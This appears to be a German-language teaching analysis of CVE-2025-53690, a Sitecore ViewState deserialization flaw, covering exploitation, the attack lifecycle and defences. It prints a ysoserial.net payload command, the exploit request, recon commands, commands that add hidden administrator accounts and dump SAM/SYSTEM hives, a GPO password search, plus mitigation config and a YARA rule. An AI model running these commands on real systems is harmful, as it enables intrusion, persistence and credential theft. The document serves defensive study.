
Dies sind CVE-2025-53690 Analysedokumente.
CVE-2025-53690 ist eine ViewState-Deserialisierungsschwachstelle in der Sitecore-Produktfamilie, die durch die Ausnutzung offengelegter ASP.NET-Machine-Keys eine Remote-Codeausführung ermöglicht – eine kritische Sicherheitslücke.
Der Kern dieser Schwachstelle liegt in fehlerhaftem Konfigurationsmanagement:
ViewState ist eine Zustandsverwaltungsfunktion von ASP.NET:
__VIEWSTATE<!-- Beispiel web.config -->
<system.web>
<machineKey
validationKey="[64-Byte-Schlüssel]"
decryptionKey="[48-Byte-Schlüssel]"
validation="HMACSHA256"
decryption="AES" />
</system.web>
Target: /sitecore/blocked.aspx
Method: POST
Eigenschaft: Ohne Authentifizierung zugänglich, verwendet ViewState
Angreifer nutzen den bekannten Machine-Key und ysoserial.net, um eine bösartige Nutzlast zu erzeugen:
# Beispielverwendung von ysoserial.net
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[Schlüssel]" --validationalg="HMACSHA256" --decryptionkey="[Schlüssel]" --decryptionalg="AES"
POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=[bösartige_Nutzlast]&__VIEWSTATEGENERATOR=[Wert]
/sitecore/blocked.aspx# Ausgeführte Befehle
whoami
hostname
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"
Bereitgestellte Tools:
7za.exe: Dateikomprimierungstoollfe.ico: EARTHWORM-Netzwerktunnel-Tool1.vbs: VBScript zur Befehlsausführung# Lokales Administratorkonto erstellen
net user asp$ [Passwort] /add
net localgroup administrators asp$ /add
net user sawadmin [Passwort] /add
net localgroup administrators sawadmin /add
Sammeln von Anmeldedaten:
reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False
# Domain Controller identifizieren
nltest /DCLIST:[domain]
nslookup [domain-controller]
# Suche nach cpassword in GPO (Group Policy Preferences-Angriff)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml
# BloodHound/SharpHound ausführen
sh.exe -c all
// Gesammelte Informationen
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
Directories = new Information.Directories
{
CurrentWebDirectory = HostingEnvironment.MapPath("~/")
},
OperatingSystemInformation = Information.GetOperatingSystemInformation(),
DiskInformation = Information.GetDiskInformation(),
NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
Process = Information.GetProcessInformation()
};
Ausgabe: Daten werden als ViewState getarnt versteckt
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"
value="/wEPDwUKLTcyODc4{AES verschlüsselt + base64-kodierte Ausgabe}" />
<!-- Eindeutigen Machine-Key generieren -->
<machineKey
validationKey="[neuer_64-Byte-Schlüssel]"
decryptionKey="[neuer_48-Byte-Schlüssel]"
validation="HMACSHA256"
decryption="AES" />
# YARA-Regelbeispiel (WEEPSTEEL-Erkennung)
rule WEEPSTEEL_Detection {
strings:
$viewstate = "__VIEWSTATE"
$crypto = "System.Security.Cryptography"
$serializer = "JavaScriptSerializer"
condition:
all of them
}
CVE-2025-53690 ist ein repräsentatives Beispiel dafür, wie ein einfacher Konfigurationsfehler zu einer schwerwiegenden Sicherheitsbedrohung führen kann. Durch diese Schwachstelle können Lernende den gesamten Lebenszyklus eines echten APT-Angriffs erfahren und moderne Angriffstechniken sowie Verteidigungsstrategien verstehen.